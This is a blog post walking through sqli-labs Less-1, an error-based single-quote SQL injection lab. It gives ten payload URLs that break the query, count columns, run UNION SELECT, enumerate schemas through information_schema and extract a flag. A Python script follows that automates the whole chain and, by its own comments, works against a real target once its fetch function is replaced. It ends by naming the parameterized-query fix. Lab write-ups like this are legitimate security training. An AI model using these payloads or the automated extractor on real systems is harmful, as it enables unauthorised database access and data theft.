Less-1

Less-1 GET - Error based - Single quotes - String (error-based GET injection, single-quoted string parameter)

1. Check whether an injection point exists

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1'

A database error is echoed on the page => injection point exists (the stray quote breaks the SQL syntax, and the error is shown to the client)

2. Determine the parameter type

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1 and 1=2

Page renders normally

`and 1=2` was never evaluated as SQL, so the value sits inside quotes: the parameter is a string type

3. Close the quote

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' and 1=2 --+

Abnormal response (no row returned)

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' and 1=1 --+

Normal response => the quote is closed successfully. `--+` is URL-decoded to `-- `, which comments out the rest of the original query; the `+` supplies the space MySQL requires after `--`.

4. Find the number of columns in the back-end query

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' order by 3 --+

Normal response

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' order by 4 --+

Error response => the query has 3 columns

5. Run a union select to find the display positions

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,3 --+

2 and 3 are shown on the page => columns 2 and 3 are the display positions (`id=-1` matches no real row, so the union row is the one rendered)

6. Read the database version

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,version() --+

7. List all databases

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

8. List the tables in the current database

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"--+

The filter must be the database name (`security`, as used in step 9), not the table name; `table_schema=database()` also works and avoids hard-coding it. This is the step that reveals the randomly named table `BRqPdnqd`.

9. List the columns of the BRqPdnqd table

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="BRqPdnqd" --+

10. Read the data in the flag column

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(flag) from BRqPdnqd--+
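The ten steps above as one automated procedure, added here as an example; it is not code from this post or from sqli-labs. `make_fake_target()` is a constructed SQLite stand-in for the vulnerable page (the real lab is PHP/MySQL), so the `information_schema` expressions of steps 7-9 are swapped for their `sqlite_master` equivalents and step 2's numeric-vs-string check, which depends on MySQL's lossy string-to-number cast, is not reproduced. `BRqPdnqd` and the sample rows are the only names taken from the post; everything else is assumed. The attacker-side functions run unchanged against a real target if `fetch` is replaced by an HTTP GET of `/?<query_string>` returning the body.

```python
import re
import sqlite3
import urllib.parse
from typing import Callable, Dict, List

Fetch = Callable[[str], str]  # query string in, HTML body out (stands in for HTTP GET)


def make_fake_target(parameterized: bool = False) -> Fetch:
    """Constructed SQLite stand-in for Less-1 (assumption: the real lab runs MySQL/PHP).

    parameterized=False splices `id` raw into a single-quoted literal, which is the
    defect the walkthrough exploits; parameterized=True binds it as a parameter instead.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
        CREATE TABLE BRqPdnqd(flag TEXT);               -- table name taken from the post
        INSERT INTO BRqPdnqd VALUES ('flag{constructed-example}');
    """)

    def fetch(query_string: str) -> str:
        # The server URL-decodes the query string, so the '+' in '--+' becomes the
        # trailing space the SQL '-- ' comment needs.
        params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
        id_value = params.get("id", [""])[0]
        try:
            if parameterized:
                row = conn.execute("SELECT id, username, password FROM users "
                                   "WHERE id=? LIMIT 0,1", (id_value,)).fetchone()
            else:
                row = conn.execute("SELECT id, username, password FROM users "
                                   f"WHERE id='{id_value}' LIMIT 0,1").fetchone()
        except sqlite3.Error as exc:  # error-based: the DB error is echoed to the client
            return f"You have an error in your SQL syntax; {exc}"
        if row is None:
            return "<html><body></body></html>"
        return f"Your Login name:{row[1]}<br>Your Password:{row[2]}"

    return fetch


def is_error(body: str) -> bool:
    return "error in your SQL syntax" in body


def union_payload(cols: int, exprs: Dict[int, str], tail: str = "") -> str:
    """Build `-1' union select 1,2,3 --+` with chosen slots replaced by expressions."""
    values = ",".join(exprs.get(i, str(i)) for i in range(1, cols + 1))
    return f"id=-1' union select {values} {tail} --+"


def count_columns(fetch: Fetch, limit: int = 32) -> int:
    """Step 4: ORDER BY n works until n exceeds the column count."""
    for n in range(1, limit + 1):
        if is_error(fetch(f"id=1' order by {n} --+")):
            return n - 1
    raise RuntimeError("column count exceeds probe limit")


def display_slots(fetch: Fetch, cols: int) -> List[int]:
    """Step 5: which numbered columns of the union row reach the page."""
    body = fetch(union_payload(cols, {}))
    return [i for i in range(1, cols + 1) if re.search(rf"(?<!\d){i}(?!\d)", body)]


def extract(fetch: Fetch, cols: int, slot: int, expr: str, tail: str = "") -> str:
    """Steps 6-10: place `expr` in a display slot and cut its value out of the page.

    The numbers-only union response is the template: whatever surrounds the slot's
    marker there surrounds the expression's value in the real response.
    """
    template = fetch(union_payload(cols, {}))
    hit = re.search(rf"(?<!\d){slot}(?!\d)", template)
    if hit is None:
        raise ValueError(f"slot {slot} is not displayed")
    before, after = template[:hit.start()], template[hit.end():]
    body = fetch(union_payload(cols, {slot: expr}, tail))
    if not (body.startswith(before) and body.endswith(after)):
        raise RuntimeError("response shape changed; check the expression")
    return body[len(before):len(body) - len(after)]


def run_walkthrough(fetch: Fetch) -> Dict[str, object]:
    """Steps 1-3 confirm a single-quoted string context, then steps 4-10 run."""
    if not is_error(fetch("id=1'")):
        raise RuntimeError("stray quote does not break the query: no Less-1 style injection")
    if is_error(fetch("id=1' and 1=1 --+")) or fetch("id=1' and 1=1 --+") != fetch("id=1"):
        raise RuntimeError("could not close the quote with ' ... --+")
    cols = count_columns(fetch)
    slot = display_slots(fetch, cols)[0]
    # SQLite stand-ins for the MySQL expressions of steps 6-10:
    #   version()                                        -> sqlite_version()
    #   group_concat(table_name) from information_schema -> group_concat(name) from sqlite_master
    return {
        "columns": cols,
        "slot": slot,
        "version": extract(fetch, cols, slot, "sqlite_version()"),
        "tables": extract(fetch, cols, slot, "group_concat(name)",
                          "from sqlite_master where type='table'"),
        "flag": extract(fetch, cols, slot, "group_concat(flag)", "from BRqPdnqd"),
    }


if __name__ == "__main__":
    print(run_walkthrough(make_fake_target()))
    try:
        run_walkthrough(make_fake_target(parameterized=True))
    except RuntimeError as exc:
        print("parameterized target:", exc)
```

Against the parameterized target the very first probe (`id=1'`) returns an empty page instead of an error, and the union payload is compared as an ordinary string that matches no row, so the procedure stops at step 1. That is the whole fix for Less-1: bind the parameter rather than splice it into the query, and do not echo database errors to the client.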

posted @ 2022-03-19 21:04  WeQi_Blog